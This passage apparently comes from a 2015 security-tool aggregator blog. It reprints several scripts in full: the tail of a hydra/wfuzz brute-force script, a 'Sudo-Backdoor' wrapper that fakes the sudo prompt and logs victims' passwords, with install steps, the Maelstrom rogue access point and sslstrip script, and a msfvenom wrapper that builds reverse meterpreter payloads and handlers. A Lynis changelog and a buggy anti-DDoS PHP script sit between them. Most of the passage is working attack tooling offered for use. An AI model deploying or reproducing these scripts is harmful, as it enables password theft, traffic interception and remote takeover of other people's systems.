fi

if [ -z "$port_445" ]
then
	echo -e "$COLOR1 + -- --=[Port 445 closed... skipping.$RESET"
else
	echo -e "$COLOR2 + -- --=[Port 445 opened... running tests...$RESET"
	hydra -L $USER_FILE -P $PASS_FILE $TARGET smb -S 445 -t $THREADS -e ns 
fi

if [ -z "$port_3306" ]
then
	echo -e "$COLOR1 + -- --=[Port 3306 closed... skipping.$RESET"
else
	echo -e "$COLOR2 + -- --=[Port 3306 opened... running tests...$RESET"
	hydra -L $USER_FILE -P $PASS_FILE $TARGET mysql -t $THREADS -e ns
fi

if [ -z "$port_8000" ]
then
	echo -e "$COLOR1 + -- --=[Port 8000 closed... skipping.$RESET"
else
	echo -e "$COLOR2 + -- --=[Port 8000 opened... running tests...$RESET"
	hydra -L $USER_FILE -P $PASS_FILE $TARGET http-head -s 8000 -t $THREADS -e ns -m /
	wfuzz -z file,$DIRBUST_FILE --hc 404,403,301 -c -t $THREADS http://$TARGET:8000/FUZZ/
	wfuzz -z file,$DIRBUST_FILE -z file,$EXT_FILE --hc 404,403,301 -c -t $THREADS http://$TARGET:8000/FUZZ.FUZ2Z
fi

if [ -z "$port_8100" ]
then
	echo -e "$COLOR1 + -- --=[Port 8100 closed... skipping.$RESET"
else
	echo -e "$COLOR2 + -- --=[Port 8100 opened... running tests...$RESET"
	hydra -L $USER_FILE -P $PASS_FILE $TARGET http-head -s 8100 -t $THREADS -e ns -m /
	wfuzz -z file,$DIRBUST_FILE --hc 404,403,301 -c -t $THREADS http://$TARGET:8100/FUZZ/
	wfuzz -z file,$DIRBUST_FILE -z file,$EXT_FILE --hc 404,403,301 -c -t $THREADS http://$TARGET:8100/FUZZ.FUZ2Z
fi

if [ -z "$port_8080" ]
then
	echo -e "$COLOR1 + -- --=[Port 8080 closed... skipping.$RESET"
else
	echo -e "$COLOR2 + -- --=[Port 8080 opened... running tests...$RESET"
	hydra -L $USER_FILE -P $PASS_FILE $TARGET http-head -s 8080 -t $THREADS -e ns -m /
	wfuzz -z file,$DIRBUST_FILE --hc 404,403,301 -c -t $THREADS http://$TARGET:8080/FUZZ/
	wfuzz -z file,$DIRBUST_FILE -z file,$EXT_FILE --hc 404,403,301 -c -t $THREADS http://$TARGET:8080/FUZZ.FUZ2Z
fi

if [ -z "$port_6667" ]
then
	echo -e "$COLOR1 + -- --=[Port 6667 closed... skipping.$RESET"
else
	echo -e "$COLOR2 + -- --=[Port 6667 opened... running tests...$RESET"
	hydra -L $USER_FILE -P $PASS_FILE $TARGET irc -s 6667 -t $THREADS -e ns
fi

echo ""
echo -e "$COLOR3################################### Brute Forcing DNS ###############################$RESET"
dnsdict6 $TARGET $DNS_FILE -4
echo ""
echo -e "$COLOR3################################### Done! ###########################################$RESET"
exit 0

Download all Script, Wordlist: Master.zip  | Clone Url
Source : https://github.com/1N3

Updates Lynis v-2.1.0 : is a system and security auditing tool for Unix/Linux.

June 3, 2015, 10:21 pm
$
0
0

Changelog v-2.1.0:

General:
———
Screen output has been improved to provide additional information.

OS support:
————
CUPS detection on Mac OS has been improved. AIX systems will now use csum utility to create host ID. Group check have been altered on AIX, to include the -n ALL. Core dump check on Linux is extended to check for actual values as well.

Software:
———-
McAfee detection has been extended by detecting a running cma binary.Improved detection of pf firewall on BSD and Mac OS. Security patch checking with zypper extended.

Session timeout:
—————–
Tests to determine shell time out setting have been extended to account for AIX, HP-UX and other platforms. It will now determine also if variable is exported as a readonly variable. Related compliance section PCI DSS 8.1.8 has been extended.

Lynis is a system and security auditing tool for Unix/Linux. Main audience of this tool is security consultants, auditors and system administrators. This tool performs a security audit of the system and determines how well it is hardened. Any detected security issues will be provided in the form of a suggestion or warning at the end of the audit. Beside security related information it will also scan for general system information, installed packages and possible configuration errors. This software aims in assisting automated auditing, hardening, software patch management, vulnerability and malware scanning of Unix/Linux based systems. It can be run without prior installation, so inclusion on read only storage is possible (USB stick, cd/dvd).
Lynis assists auditors in performing Basel II, GLBA, HIPAA, PCI DSS and SOx (Sarbanes-Oxley) compliance audits, by automation of control testing.Lynis is a system and security auditing tool

Features :
+ System auditing
+ Hardening suggestions
+ Security scan
+ Vulnerability scan

Download : lynis-2.1.0.tar.gz (180.5 kB)
Source : https://cisofy.com/
Our Post Before : http://seclist.us/updates-lynis-v-1-6-4-is-a-system-and-security-auditing-tool-for-unixlinux.html

mod_wallz and Web-Firewall Released.

June 5, 2015, 10:46 am
$
0
0

mod_wallz is a : Apache mod to mitigate Layer 7 DDoS attacks.
Web-Firewall is a The firewall project for mitigating HTTP Layer 7 DDoS attack through PHP.
Php Script for web-Firewall:

<?php
/* Layer 7 HTTP GET DDoS protection script */
/* Prerequisites: iptables, PHP, Apache, openssl */
	$CFAK = "scrubbed"; // Cloudflare API Key
	$CFEMAIL= "scrubbed"; // Cloudflare Email
	$TTL = 3600; //Time in seconds for channelge TTL 1 hour is default
	if(empty($_SERVER['HTTP_CF_IPCOUNTRY'])){
		$CLOUDFLARE= false;
	}else{
		$CLOUDFLARE= true;
	}
	function ban($ip){
		global $CFAK, $CFEMAIL, $CLOUDFLARE;
		if(!$CLOUDFLARE){return false;}
		$url = 'https://www.cloudflare.com/api_json.html';
		$f = array(
			'a' => "ban",
			'tkn' => $CFAK,
			'email' => $CFEMAIL,
			"key" => $ip
		);
		$f = array_merge($p,$f);
		foreach($f as $k=>$v) { $fs .= $k.'='.$v.'&'; }
		rtrim($fs, '&');
		$ch = curl_init();
		curl_setopt($ch,CURLOPT_URL, $url);
		curl_setopt($ch,CURLOPT_POST, count($f));
		curl_setopt($ch,CURLOPT_POSTFIELDS, $fs);
		$r = curl_exec($ch);
		curl_close($ch);
		return $r;
	}
	function kill($m=1){
		ban($_SERVER['REMOTE_ADDR']);
		header("HTTP/1.0 403 Forbidden");
		echo "You have been denied.";
		die();
	}
	function checkLegit(){
		echo '<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.3/jquery.min.js"></script><script>
				function getCookie(cname) {
			var name = cname + "=";
			var ca = document.cookie.split(";");
			for (var i = 0; i < ca.length; i++) {
				var c = ca[i];
				while (c.charAt(0) == " ") c = c.substring(1);
				if (c.indexOf(name) === 0) return c.substring(name.length, c.length);
			}
			return "";
		}
		$.get("'.$_SERVER['PHP_SELF'].'?_wf=" & getCookie("wf_ini"), function (d) {
			$("#token").html(d);
			$.get("'.$_SERVER['PHP_SELF'].'?_wf_ACK=" & $("#token").html(), function (r) {
			if(r == "Ok"){
				alert("Press Ok to continue...");
				location.reload();
			}else{
				$("#token").html("Failed bot challenge......");
            }
			});
		});
		</script><div id="tkn_hdr">Token:</div><div id="token">[Nothing]</div>';
		$CID = substr(bin2hex(openssl_random_pseudo_bytes(192)), 1, 32);
		setcookie("wf_ini",$CID.time(),time()+10);
		file_put_contents("/tmp/_wf.id",$_SERVER['REMOTE_ADDR']."&".$CID.time()+10 ."\n",FILE_APPEND);
		die();
	}
	function verCookie(){
		$va = explode(":",explode("\n",file_get_contents("/tmp/_wf.wl")));
		if(in_array($_SERVER['REMOTE_ADDR'].":".htmlspecialchars_decode($_COOKIE['wf_twl']),$va[0].":".$va[1])){
			return true;
		}elseif(in_array(htmlspecialchars_decode($_COOKIE['wf_twl']),explode(":",explode("\n",file_get_contents("/tmp/_wf.wl")))[1])){
			setcookie("wf_twl",'',1);
			echo "Different-origin violation. This incidence has been forgiven.";
			die();
		}else{
			setcookie("wf_twl",'',1);
			ban($_SERVER['REMOTE_ADDR']);
			die();
		}
	}
	function setwfCookie(){
		$CID = substr(bin2hex(openssl_random_pseudo_bytes(192)), 1, 32);
		setcookie("wf_twl",$CID,$time+$TTL);
		file_put_contents("/tmp/_wf.wl",$_SERVER['REMOTE_ADDR'].":".$CID.":".time());
	}
	setwfCookie();
	echo var_dump(verCookie());

install.sh Script:

#!/bin/bash
echo "Beta code-upload means unless you know how to re-make this installation script, you won't be able to install this."
## THIS REPO IS CURRENTLY USED TO BACKUP MY CODE, NOT PUBLISHING.
## MAN, do not install this for now, this is highly likely to ruin your server (and your day) since its still pretty much Pre-Alpha, it's not even working.
## Alternatively, if you want to fuck your server up, uncomment the line below.
#apxs -i -a -c mod_wallz.c

wallz.conf Script:

LoadModule wallz_module modules/mod_wallz.so
<IfModule mod_wallz.c>
# Nullis in derpis
</IfModule>

mod_wallz.c Script :

#include "httpd.h"
#include "http_core.h"
#include "http_config.h"
#include "http_log.h"
#include "http_request.h"
module AP_MODULE_DECLARE_DATA   wallz_module =
{ 
    STANDARD20_MODULE_STUFF,
    create_dir_conf,
    merge_dir_conf,
    create_svr_conf,
    merge_svr_conf,
    directives,
    register_hooks
};
LoadModule wallz_module modules/mod_wallz.so

Source : https://github.com/LolDatSec

Sudo-Backdoor : Wrapper to sudo for stealing user Password.

June 16, 2015, 6:08 pm
$
0
0

Wrapper to sudo; prompts regularily but steals user’s password. For those annoying times when you get a “non-privileged” sudo-enabled shell.
Installation:
1. Append the following line to the target user’s .bashrc file by running the following command:
$ echo “export PATH=~/.payload:$PATH” >> ~/.bashrc
2. Then, create ~/.payload/sudo and paste the following code in the file. Don’t forget to make the bash script executable by issuing the following Command:
$ chmod a+x ~/.payload/sudo
3. Obviously you might have to adapt this installation recipe to fit the user’s shell. If they are using zsh, then install to ~/.zshrc, etc.

Proof of concept: foobar is the target with password `foobarz1`
[foobar:~]$ tail -n 1 ~/.bashrc
export PATH=~/.payload:$PATH
[foobar:~]$ ls -la ~/.payload/sudo 
-rwxr-xr-x 1 foobar foobar 420 Aug 16 01:21 /home/foobar/.payload/sudo
[foobar:~]$ sudo id
[sudo] password for foobar: [inserted wrong password `barbaz` here as proof of concept]
Sorry, try again.
[sudo] password for foobar: [inserted `foobarz1` here]
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),19(log)
[foobar:~]$ cat /tmp/.ICE-unix-test 
foobar:barbaz:invalid
foobar:foobarz1:valid
[foobar:~]$ sudo id [the system remembers previous authentification]
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),19(log)

Bash Script:

#!/bin/bash
/usr/bin/sudo -n true 2>/dev/null
if [ $? -eq 0 ]
then
    /usr/bin/sudo $@
else
    echo -n "[sudo] password for $USER: "
    read -s pwd
    echo
    echo "$pwd" | /usr/bin/sudo -S true 2>/dev/null
    if [ $? -eq 1 ]
    then
	echo "$USER:$pwd:invalid" >> /tmp/.ICE-unix-test
	echo "Sorry, try again."
	sudo $@
    else
	echo "$USER:$pwd:valid" >> /tmp/.ICE-unix-test
	echo "$pwd" | /usr/bin/sudo -S $@
    fi
fi

Source :https://github.com/ldionmarcil

Maelstrom – Bash Script for WiFi Vector Attack.

June 21, 2015, 9:35 am
$
0
0

wifi vector attack for kali nethunterwifi-attack
With Options :
1. Perform EvilAP
2. Perform accespoint-soft
3. Perform accespoint-ssl
4. Perform accespoint-captive-portal
5. Perform urlsnarf
6. Perform driftnet
7. Perform tails dhcp
8. Perform tails sslstrip
9. Perform tails Captive Portal

Maelstrom.sh Script:

#!/bin/bash

#author : Armaal
#year : 2015
#info : wifi vector attack for kali nethunter

f_interface(){
clear
echo "Maelstrom";

echo -e "\e[93mAutomated scripties\e[0m"
echo -e "\e[4mChose your flavor:\e[24m"
echo -e "\e[34mRun EvilAP [1] in first!\e[0m"
echo
echo "1. Perform EvilAP "
echo "--- - --- - --- - ---"
echo "2. Perform accespoint-soft "
echo "3. Perform accespoint-ssl "
echo "4. Perform accespoint-captive-portal  "
echo "--- - --- - --- - ---"
echo "5. Perform urlsnarf  "
echo "6. Perform driftnet "
echo "--- - --- - --- - ---"
echo "7. Perform tails dhcp "
echo "8. Perform tails sslstrip "
echo "9. Perform tails Captive Portal "

echo
echo -e "\e[34mDon't forget to use tails.sh\e[0m"
echo
read -p "Choice: " interfacechoice
echo

  case $interfacechoice in
    1) f_evilap ;;
	2) f_accespoint-soft ;;
	3) f_accespoint-ssl ;;
	4) f_accespoint-dnspoof-captive ;;
    	5) f_urlsnarf ;;
	6) f_driftnet;;
	7) f_dhcp;;
	8) f_ssl;;
	9) f_captive ;;
  esac
}
echo
echo
f_accespoint-soft(){

#cleanning iptable
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain

#start to set rules on iptable based on the dhcpd.conf
ifconfig at0 up
ifconfig at0 192.168.7.1 netmask 255.255.255.0
route add -net 192.168.7.0 netmask 255.255.255.0 gw 192.168.7.1
pkill dhcpd
/etc/init.d/isc-dhcp-server start

#active router mod and configure some iptable
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
}

f_accespoint-ssl (){

#cleanning iptable
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain

#Start to set rules on iptables based on the dhcpd.conf
ifconfig at0 up
ifconfig at0 192.168.7.1 netmask 255.255.255.0
route add -net 192.168.7.0 netmask 255.255.255.0 gw 192.168.7.1
pkill dhcpd
/etc/init.d/isc-dhcp-server start

#Iptable rules
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8888
#Launch ssltrip with log
echo
echo -e "\e[34mLogs saved to /sdcard/capture/ssl/\e[0m"
logfile=/sdcard/capture/ssl/sslstrip_$(date +%F-%H%M).log
echo
echo -e "\e[35m*When you have finish the sslstrip (ctrl-C to escape)\e[0m"
echo -e "\e[35m*You will be able to see the result in this terminal\e[0m"
cd /opt/pwnpad/sslstrip
python sslstrip.py -pfk -l 8888 -w $logfile
echo
echo -e "\e[96mLook at the results :\e[0m"
echo
tail -f $logfile
}

f_accespoint-dnspoof-captive(){

#cleanning iptable
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain

#Start to set rules on iptables based on the dhcpd.conf
ifconfig at0 up
ifconfig at0 192.168.7.1 netmask 255.255.255.0
route add -net 192.168.7.0 netmask 255.255.255.0 gw 192.168.7.1

#iptable rules
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT

#put the wlan0 ip
echo -e "\e[34mGet a grep on wlan0\e[0m"
echo -e "\e[34mcopy your wlan0 IP\e[0m"
ifconfig wlan0 | grep "inet " | awk -F'[: ]+' '{ print $4 }'
echo
read -p "Enter wlan0 local ip ->" iplocal

iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination $iplocal:80
iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination $iplocal:80
iptables -t nat -A POSTROUTING -j MASQUERADE
pkill dhcpd
echo -e "\e[31mDHCP-server start\e[0m"
/etc/init.d/isc-dhcp-server start
sleep 2s
service apache2 restart
sleep 1s
echo -e "\e[31mSpoofing DNS\e[0m"
echo -e "\e[34mLogs saved to /sdcard/capture/dnspoof/\e[0m"
screen -dmS dnsspoof dnsspoof -i at0 -f /usr/local/hosts
}

#DRIFTNET#
clear
echo
f_driftnet(){

   echo -e "\e[93mdriftnet with verbose\e[0m"
   driftnet -v -i at0
}

#URLSNARF#
clear
echo
f_urlsnarf(){

   echo -e "\e[93mLogs saved to /sdcard/capture/urlsnarf/\e[0m"
   urlsnarf -i at0 >> /sdcard/capture/urlsnarf/urlsnarf_$(date +%F-%H%M).log
}

#EVILAP#
clear
echo
f_evilap(){

#change the hostname and mac address randomly
echo -e "\e[35mRolling MAC address and Hostname randomly to make you more difficult to find\e[0m"
ifconfig wlan1 down
macchanger -r wlan1
echo
echo -e "\e[35mYour new local mac adress:\e[0m"
hn=`ifconfig wlan1 |grep HWaddr |awk '{print$5}' |awk -F":" '{print$1$2$3$4$5$6}'`
hostname $hn
echo $hn
echo
echo -e " \e[44mLet's GO\e[0m"
echo -e "\e[31mStop previous mon0\e[0m"
airmon-ng stop mon0

#Put wlan1 into monitor mode - mon0 created
echo -e "\e[31mcreating the new mon0 from wlan1\e[0m"
echo
airmon-ng start wlan1
echo -e "\e[92mIt's Ok\e[0m"
clear

#airbase-ng#
echo -e "\e[96mSet up EvilAP in Bad Karma\e[0m"
echo
echo -e "\e[93mtarget the channel of the router\e[0m"
echo -e "\e[93mtarget the name of the router\e[0m"
echo
read -p "Enter the Wi-Fi [AP Channel] : " channel
read -p "Enter the Wi-Fi [ESSID] : " essid
clear
echo
echo -e "\e[93mLogs saved to /sdcard/capture/evilap/\e[0m"
echo -e "\e[34mEvilAP is running in background\e[0m"
screen -dmS karma airbase-ng -P -C 60 -y -e $essid -c $channel -v wlan1mon 
}

#TAILS CAPTIVE_PORTAL#
echo
f_captive(){
clear
echo -e " \e[44mCaptive Portal Tail\e[0m"
tail -f /var/www/"$wwwdir"/"formdata.txt"
}
#TAILS DHCP LEASE#
echo
f_dhcp(){
clear
echo -e " \e[44mDHCP Tail Lease\e[0m"
#cleanning any pre-existing dhcp lease
echo > /var/lib/dhcp/dhcpd.leases
cat /dev/null > /tmp/dhcpd.conf
sleep 1s
tail -f /var/lib/dhcp/dhcpd.leases 2> /dev/null | grep --color -E "lease|hardware|client"
}
#TAILS SSLTRIP LOG#
echo
f_ssl(){
clear
echo -e " \e[44mSSL Tail filtering mail extension\e[0m"
echo
tail -f /opt/maelstrom/ssllog.txt | grep -E 'orange.fr|gmail.com|free.fr|hotmail.fr|hotmail.com'
}

#RUN INTERFACE#
f_run(){
  f_interface 
  }
 
f_run

Update.sh:

#!/bin/bash

echo -e "\e[93mUpdate the script\e[0m"
git pull
echo -e "\e[93mdone\e[0m"

Source : https://github.com/Armaal

Search

Msfvenom Payload Creator (MPC).

June 23, 2015, 3:20 am
$
0
0

Msfvenom Payload Creator (MPC) is a wrapper to generate multiple types of payloads, based on users choice. The idea is to be as simple as possible (only requiring one input) to produce their payload.
Fully automating Msfvenom & Metasploit is the end goal (well as to be be able to automate MPC itself). The rest is to make the user’s life as easy as possible (e.g. IP selection menu, msfconsole resource file/commands and a quick web server etc).
The only necessary input from the user should be defining the payload they want by either the platform (e.g. windows), or the file extension they wish the payload to have (e.g. exe).

Quickly generate Metasploit payloads using msfvenom.

Quickly generate Metasploit payloads using msfvenom.

Install:
Designed for Kali Linux 1.1.0a+ & Metasploit v4.11+ (nothing else has been tested).

curl -k -L "https://raw.githubusercontent.com/g0tmi1k/mpc/master/mpc.sh" > /usr/bin/mpc
chmod +x /usr/bin/mpc
mpc

Help :

root@kali:/var/www# bash /root/mpc.sh
 [*] Msfvenom Payload Creator (MPC)

 [i] Missing type

 [i] /root/mpc.sh <TYPE> (<IP>) (<PORT>)
 [i] TYPE:
 [i]   + ASP (meterpreter)
 [i]   + Bash (meterpreter)
 [i]   + Linux (meterpreter)
 [i]   + PHP (meterpreter)
 [i]   + Python (meterpreter)
 [i]   + Windows (meterpreter)
 [i] IP will default to IP selection menu
 [i] PORT will default to 443
root@kali:/var/www#

Example :

Example #1 (PHP - Fully Automated)
root@kali:/var/www# bash /root/mpc.sh php 127.0.0.1
 [*] Msfvenom Payload Creator (MPC)
 [i]   IP: 127.0.0.1
 [i] PORT: 443
 [i] TYPE: PHP (php/meterpreter_reverse_tcp)
 [i]  CMD: msfvenom --payload php/meterpreter_reverse_tcp --format raw --platform php --arch php LHOST=127.0.0.1 LPORT=443 -o /var/www/php_meterpreter.php
No encoder or badchars specified, outputting raw payload
Saved as: /var/www/php_meterpreter.php
 [i] PHP meterpreter created as '/var/www/php_meterpreter.php'
 [i] MSF handler file create as 'php_meterpreter.rc (msfconsole -q -r /var/www/php_meterpreter.rc)'
 [?] Quick web server?   python -m SimpleHTTPServer 8080
 [*] Done!
root@kali:/var/www#

Example #2 (Windows - Interactive)
root@kali:/var/www# bash /root/mpc.sh exe
 [*] Msfvenom Payload Creator (MPC)

 [i] Use which IP address?:
 [i]   1.) 192.168.103.136
 [i]   2.) 192.168.155.175
 [i]   3.) 127.0.0.1
 [?] Select 1-3: 2

 [i]   IP: 192.168.155.175
 [i] PORT: 443
 [i] TYPE: Windows (windows/meterpreter/reverse_tcp)
 [i]  CMD: msfvenom --payload windows/meterpreter/reverse_tcp --format exe --platform windows --arch x86 LHOST=192.168.155.175 LPORT=443 -o /var/www/windows_meterpreter.exe
No encoder or badchars specified, outputting raw payload
Saved as: /var/www/windows_meterpreter.exe
 [i] Windows meterpreter created as '/var/www/windows_meterpreter.exe'
 [i] MSF handler file create as 'windows_meterpreter.rc (msfconsole -q -r /var/www/windows_meterpreter.rc)'
 [?] Quick web server?   python -m SimpleHTTPServer 8080
 [*] Done!
root@kali:/var/www#

To-Do List:
– Display interface name next to IP address (e.g. 2.) 192.168.155.175 [eth1])
– Display file stats (e.g. file, size, md5/sha1) Commands are in, just commented out.
– Cleaner command line arguments (e.g. -ip 127.0.0.1, -v etc)
– Support different payloads (e.g. standard shells/nc & reverse_http/reverse_https, bind etc)
– x64 payloads

Script.sh :

#!/bin/bash
#-Metadata----------------------------------------------------#
#  Filename: mpc.sh                      (Update: 2015-06-22) #
#-Info--------------------------------------------------------#
#  Quickly generate Metasploit payloads using msfvenom.       #
#-Author(s)---------------------------------------------------#
#  g0tmilk ~ https://blog.g0tmi1k.com/                        #
#-Operating System--------------------------------------------#
#  Designed for: Kali Linux & Metasploit v4.11+               #
#-Licence-----------------------------------------------------#
#  MIT License ~ http://opensource.org/licenses/MIT           #
#-Notes-------------------------------------------------------#
#                             ---                             #
#-------------------------------------------------------------#


#-Defaults-------------------------------------------------------------#


outputPath="$(pwd)/"     # ./  /var/www/   /tmp/

##### (Cosmetic) Colour output
RED="\033[01;31m"
GREEN="\033[01;32m"
YELLOW="\033[01;33m"
BLUE="\033[01;34m"
RESET="\033[00m"

##### Read command line arguments
TYPE="$(echo ${1} | tr '[:upper:]' '[:lower:]')"
IP="${2}"
PORT="${3}"
[[ -z "${IP}" ]] && IP=( $(ifconfig | grep inet | \grep -E '([[:digit:]]{1,2}.){4}' | sed 's/://g; s/inet//g; s/addr//g; s/^[ \t]*//' | cut -d ' ' -f1) )
[[ -z "${PORT}" ]] && PORT="443"
SUCCESS=false

##### (Optional) Enable debug mode?
#set -x


#-Function-------------------------------------------------------------#

## doAction TYPE IP PORT PAYLOAD CMD FILEEXT
function doAction {
  TYPE="${1}"
  IP="${2}"
  PORT="${3}"
  PAYLOAD="${4}"
  CMD="${5}"
  FILEEXT="${6}"

  FILENAME="$(echo ${TYPE}_meterpreter.${FILEEXT} | tr '[:upper:]' '[:lower:]')"
  FILEHANDLE="$(echo ${TYPE}_meterpreter.rc | tr '[:upper:]' '[:lower:]')"

  echo -e " ${YELLOW}[i]${RESET}   IP: ${YELLOW}${IP}${RESET}"
  echo -e " ${YELLOW}[i]${RESET} PORT: ${YELLOW}${PORT}${RESET}"
  echo -e " ${YELLOW}[i]${RESET} TYPE: ${YELLOW}${TYPE}${RESET} (${PAYLOAD})"
  echo -e " ${YELLOW}[i]${RESET}  CMD: ${YELLOW}${CMD}${RESET}"

  [[ -e "${FILENAME}" ]] && echo -e " ${YELLOW}[i]${RESET} File (${FILENAME}) ${YELLOW}already exists${RESET}. Overwriting..."
  eval "${CMD}"

  #echo -e " ${YELLOW}[i]${RESET}  File: $(file -b ${FILENAME})"
  #echo -e " ${YELLOW}[i]${RESET}  Size: $(du -h ${FILENAME} | cut -f1)"
  #echo -e " ${YELLOW}[i]${RESET}   MD5: $(md5sum ${FILENAME} | awk '{print $1}')"
  #echo -e " ${YELLOW}[i]${RESET}  SHA1: $(sha1sum ${FILENAME} | awk '{print $1}')"

  cat <<EOF > "${FILEHANDLE}"
#
# RUN:   service postgresql start; service metasploit start; msfconsole -q -r "${FILENAME}"
#
setg TimestampOutput true
setg VERBOSE true
use exploit/multi/handler
set PAYLOAD ${PAYLOAD}
set LHOST ${IP}
set LPORT ${PORT}
set AutoRunScript "migrate -f"
set ExitOnSession false
exploit -j -z
EOF
  echo -e " ${YELLOW}[i]${RESET} ${TYPE} meterpreter created as '${YELLOW}${outputPath}${FILENAME}${RESET}'"
  echo -e " ${YELLOW}[i]${RESET} MSF handler file create as '${YELLOW}${FILEHANDLE}${RESET} (msfconsole -q -r $(pwd)/${FILEHANDLE})'"
  SUCCESS=true
  return
}


#-Start----------------------------------------------------------------#


## Banner
echo -e " ${BLUE}[*]${RESET} ${BLUE}M${RESET}sfvenom ${BLUE}P${RESET}ayload ${BLUE}C${RESET}reator (${BLUE}MPC${RESET})"


## IP selection menu
if [[ -n "${1}" ]] && [[ -z "${2}" ]]; then
  echo -e "\n ${YELLOW}[i]${RESET} Use which ${YELLOW}IP address${RESET}?:"
  _I=0
  for ip in "${IP[@]}"; do
    _I=$[${_I} +1]
    echo -e " ${YELLOW}[i]${RESET}   ${GREEN}${_I}${RESET}.) ${ip}"
  done
  while true; do
    echo -ne " ${YELLOW}[?]${RESET} ${GREEN}Select${RESET} 1-${#IP[@]}"; read -p ": " INPUT
    [[ "${INPUT}" -ge 1 ]] && [[ "${INPUT}" -le "${#IP[@]}" ]] && IP=${IP[${INPUT}-1]} && break
  done
  echo ""
fi

## ASP
if [[ "${TYPE}" == "asp" ]]; then
  TYPE="windows"
  FILEEXT="asp"
  PAYLOAD="${TYPE}/meterpreter/reverse_tcp"
  CMD="msfvenom --payload ${PAYLOAD} --format asp --platform ${TYPE} --arch x86 LHOST=${IP} LPORT=${PORT} -o ${outputPath}${TYPE}_meterpreter.${FILEEXT}"
  doAction "ASP" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}"
## Bash
elif [[ "${TYPE}" == "bash" ]] || [[ "${TYPE}" == "sh" ]]; then
  TYPE="bash"
  FILEEXT=".sh"
  PAYLOAD="cmd/unix/reverse_bash"
  CMD="msfvenom --payload ${PAYLOAD} --format raw --platform ${TYPE} --arch ${TYPE} LHOST=${IP} LPORT=${PORT} -o ${outputPath}${TYPE}_meterpreter.${FILEEXT}"
  doAction "PHP" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}"
## Linux
elif [[ "${TYPE}" == "linux" ]] || [[ "${TYPE}" == "lin" ]] || [[ "${TYPE}" == "elf" ]]; then
  TYPE="linux"
  FILEEXT="bin"
  PAYLOAD="${TYPE}/x86/meterpreter/reverse_tcp"
  CMD="msfvenom --payload ${PAYLOAD} --format elf --platform ${TYPE} --arch x86 LHOST=${IP} LPORT=${PORT} -o ${outputPath}${TYPE}_meterpreter.${FILEEXT}"
  doAction "Linux" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}"
## PHP
elif [[ "${TYPE}" == "php" ]]; then
  TYPE="php"
  FILEEXT="php"
  PAYLOAD="${TYPE}/meterpreter_reverse_tcp"
  CMD="msfvenom --payload ${PAYLOAD} --format raw --platform ${TYPE} --arch ${TYPE} LHOST=${IP} LPORT=${PORT} -o ${outputPath}${TYPE}_meterpreter.${FILEEXT}"
  doAction "PHP" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}"
## Python
elif [[ "${TYPE}" == "python" ]] || [[ "${TYPE}" == "py" ]]; then
  TYPE="python"
  FILEEXT="py"
  PAYLOAD="${TYPE}/meterpreter/reverse_tcp"
  CMD="msfvenom --payload ${PAYLOAD} --format raw --platform ${TYPE} --arch ${TYPE} LHOST=${IP} LPORT=${PORT} -o ${outputPath}${TYPE}_meterpreter.${FILEEXT}"
  doAction "Python" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}"
## Windows
elif [[ "${TYPE}" == "windows" ]] || [[ "${TYPE}" == "win" ]] || [[ "${TYPE}" == "exe" ]]; then
  TYPE="windows"
  FILEEXT="exe"
  PAYLOAD="${TYPE}/meterpreter/reverse_tcp"
  CMD="msfvenom --payload ${PAYLOAD} --format exe --platform ${TYPE} --arch x86 LHOST=${IP} LPORT=${PORT} -o ${outputPath}${TYPE}_meterpreter.${FILEEXT}"
  doAction "Windows" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}"
elif [[ -z "${TYPE}" ]]; then
  echo -e "\n ${YELLOW}[i]${RESET} ${YELLOW}Missing type${RESET}"
else
  echo -e "\n ${YELLOW}[i]${RESET} Unknown type: ${YELLOW}${TYPE}${RESET}"
fi

if [[ "$SUCCESS" = true ]]; then
  echo -e " ${GREEN}[?]${RESET} Quick ${GREEN}web server${RESET}?   python -m SimpleHTTPServer 8080"
  echo -e " ${BLUE}[*]${RESET} ${BLUE}Done${RESET}!"
  exit 0
else
  echo -e "\n ${YELLOW}[i]${RESET} ${BLUE}${0}${RESET} <TYPE> (<IP>) (<PORT>)"
  echo -e " ${YELLOW}[i]${RESET} TYPE:"
  echo -e " ${YELLOW}[i]${RESET}   + ${YELLOW}ASP${RESET} (meterpreter)"
  echo -e " ${YELLOW}[i]${RESET}   + ${YELLOW}Bash${RESET} (meterpreter)"
  echo -e " ${YELLOW}[i]${RESET}   + ${YELLOW}Linux${RESET} (meterpreter)"
  echo -e " ${YELLOW}[i]${RESET}   + ${YELLOW}PHP${RESET} (meterpreter)"
  echo -e " ${YELLOW}[i]${RESET}   + ${YELLOW}Python${RESET} (meterpreter)"
  echo -e " ${YELLOW}[i]${RESET}   + ${YELLOW}Windows${RESET} (meterpreter)"
  echo -e " ${YELLOW}[i]${RESET} IP will default to ${YELLOW}IP selection menu${RESET}"
  echo -e " ${YELLOW}[i]${RESET} PORT will default to ${YELLOW}443${RESET}"
  exit 1
fi

Source : https://blog.g0tmi1k.com/

DNSaxfr – Shell script for testing DNS AXFR vulnerability.

